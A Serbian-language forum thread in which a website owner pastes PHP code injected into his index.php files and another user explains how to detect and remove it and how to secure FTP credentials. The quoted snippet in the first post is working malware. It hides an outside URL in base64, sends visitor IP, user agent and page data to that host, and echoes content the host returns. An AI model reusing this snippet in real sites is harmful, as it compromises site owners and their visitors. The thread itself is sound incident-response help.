Izmenjen kod u index.php fajlu na sajtu, a AV prijavljuje trojanca

[ pakito @ 04.06.2013. 21:44 ] @

Posle upozorenja AV da su mi index.php fajlovi na sajtu zarazeni, pogledao sam ih i u dva indeksna fajla nasao sam kao dodat, sledeci kod:

Code:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

Ocistio sam index.php i upozorenje mog AV progama je nestalo, ali mi se javljaju prijatelji da im browser ne da da udju na sajt zbog trojanca.

Moj AV je Microsoft Security Essentials, a prijatelj koji mi se javio ima AVAST!

Zanima me kako je mogao da uleti ovaj kod, i narocito kako mogu da proverim da li je sajt i dalje zarazen, i kako da se zastitim?

Lokacije na sajtu su:
http://www.paundurlic.com/vlaski.recnik/index.php
http://www.paundurlic.com/forum.vlasi.srbije/index.php

[ valjan @ 05.06.2013. 04:02 ] @

Kod sajtova je najbolji način detekcije preko Sucuri skenera, evo rezultata za tvoj domen: http://sitecheck.sucuri.net/results/paundurlic.com i kao što možeš da vidiš ima još zaraženih fajlova (http://www.paundurlic.com/counter.php između ostalog, ako se dobro sećam o čemu se radi biće ih još, treba proveriti sve index.php, footer.php, header.php, function.php...). Ovaj konkretan primerak sam već uklanjao sa nekoliko desetina sajtova, ali ga nisam sretao već jedno vreme, ili je to tu odavno, ili se pojavila neka nova varijanta. Sam skript nije vidljiv običnom posetiocu, aktivira se kad sajtu pristupi Google, Baidu ili Bing bot što se može i videti iz koda. Ako imaš neki nezaražen backup, preporučujem da vratiš fajlove odatle, jer ručno skeniranje i uklanjanje može potrajati i danima, zavisi od strukture samog sajta...

I ako imaš Google Webmaster Tools, tu takođe možeš odraditi proveru tako što ćeš proveriti kako Google bot vidi tvoj sajt, i tu odmah možeš videti šta u stvari taj kod radi - ako sajt izgleda približno isto kao i kad se gleda iz browsera, infekcije nema. Iz Webmaster Toolsa možeš zatražiti i da ti google skine blokadu sa sajta, ako su te u međuvremenu blokirali.

Ako server upisuje pristup preko FTP-a u log fajlove verovatno ćeš pronaći tragove da je neko osim tebe menjao zaražene fajlove, što znači da još neko osim tebe ima username i password za taj FTP server. A to opet znači da ili koristiš jednostavnu kombinaciju (npr. username pera i password pera), ili je password suviše jednostavan (pogledaj primere koje treba da izbegavaš), ili na tvom računaru imaš trojanca koji krade FTP lozinke, odnosno beleži sve što kucaš. Ako koristiš Total Commander za pristup FTP serveru, ažuriraj ga na poslednju verziju, i koristi opciju za enkripciju lozinki, jer ćeš na taj način sprečiti da bilo koji najjednostavniji malware sa lakoćom pročita tvoje lozinke.

Naravno, iz svega ovog proizlazi da je potrebno da svoj računar skeniraš na prisustvo keyloggera i password stealera, kao i sve ostale računare sa kojih se preko FTP-a pristupa serveru na kojem je sajt. Kada ukloniš trojance, obavezno promeni password i koristi neku jaku kombinaciju (najmanje 8 karaktera, obavezno mešavina malih i velikih slova, brojeva i spec. znakova, izbegavati reči iz rečnika odnosno koristiti niz karaktera koji izgleda što nasumičnije odabran itd.). Pozivam kolege forumaše da pomognu oko onog prvog dela, tj. potrage za KL i PS malware-om na tvom računaru.

[ pakito @ 05.06.2013. 15:04 ] @

Hvala na iscrpnom odgovoru.
Poterao sam naznačeni program i počistio sve što je on pokazivao da je uprljano.
Koliko se može verovati "siteceku", sajt je sada čist!
http://sitecheck.sucuri.net/results/paundurlic.com

PS. Ako sam dobro razumeo, onaj citirani kod nije delo nekog "bota", nego (ne)delo ljudskih ruku, nekog stranog plaćenika i domaćeg izdajnika?!?

[ valjan @ 05.06.2013. 16:21 ] @

Citat:

pakito:
PS. Ako sam dobro razumeo, onaj citirani kod nije delo nekog "bota", nego (ne)delo ljudskih ruku, nekog stranog plaćenika i domaćeg izdajnika?!?

jeste to neko jednom napisao, ali trojanac ti mazne lozinku, trojanac je i ubaci na tvoj sajt...